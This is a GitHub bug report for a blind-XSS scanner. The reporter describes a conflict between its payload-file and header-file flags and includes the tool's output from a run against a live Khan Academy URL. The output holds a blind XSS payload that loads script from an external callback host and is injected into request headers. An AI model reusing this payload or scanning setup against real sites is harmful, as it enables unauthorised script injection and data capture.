Skip to content

Conflict Between -pf and -hf Flags #15

Open
Open
Conflict Between -pf and -hf Flags#15
@bytes-Knight

Description

@bytes-Knight
bytes-Knight
opened on Sep 10, 2025

└─$ cat x1.txt | BXSS -pf ~/file/tools/loxs/payloads/bxss.txt -hf ~/hf.txt -l -c 3 -a -f

| __ ) __ __ ___ ___
| _ \ \ / / / _| / |
| |) | > < _ \ __
|/ //_\ |/ |/

    v0.0.3

[NOTICE] Please Be Patient for bxss
[NOTICE] Checking URL Scheme: https://www.khanacademy.org/search?page_search_query=Gxss&referer=%2F

================================================================================

[INFO] Using Header: '"><script src=https://xss.report/c/X></script>
[INFO] Using Trace Mode
[INFO] New Payload:'"><script src=https://xss.report/c/X></script>

[NOTICE] Method: GET
[NOTICE] https://www.khanacademy.org/search?page_search_query=Gxss&referer=%2F

[ERROR] Error making request: Invalid header name (-32602)
[NOTICE] Method: POST
[NOTICE] https://www.khanacademy.org/search?page_search_query=Gxss&referer=%2F

[ERROR] Error making request: Invalid header name (-32602)
[NOTICE] Method: OPTIONS
[NOTICE] https://www.khanacademy.org/search?page_search_query=Gxss&referer=%2F

[ERROR] Error making request: Invalid header name (-32602)
[NOTICE] Method: PUT
[NOTICE] https://www.khanacademy.org/search?page_search_query=Gxss&referer=%2F

This tool breaks when I use both -pf and -hf flags together.
Instead of taking headers from a different file, it replaces the blind XSS payloads in the headers.

[INFO] Using Header: '"><script src=https://xss.report/c/X></script>

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions